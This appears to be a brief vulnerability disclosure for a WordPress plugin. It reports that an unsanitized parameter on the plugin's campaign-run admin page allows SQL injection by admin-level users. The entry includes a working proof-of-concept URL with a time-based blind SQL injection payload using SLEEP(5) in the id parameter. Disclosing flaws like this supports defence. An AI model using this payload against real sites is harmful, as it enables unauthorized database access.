Description The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admin+ to perform SQL injection attacks
As an admin open a link like: http://example.com/wp-admin/admin.php?page=enl-campaigns&action;=campaign-run&id;=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) There will be a delay indicating that the injection has succeeded.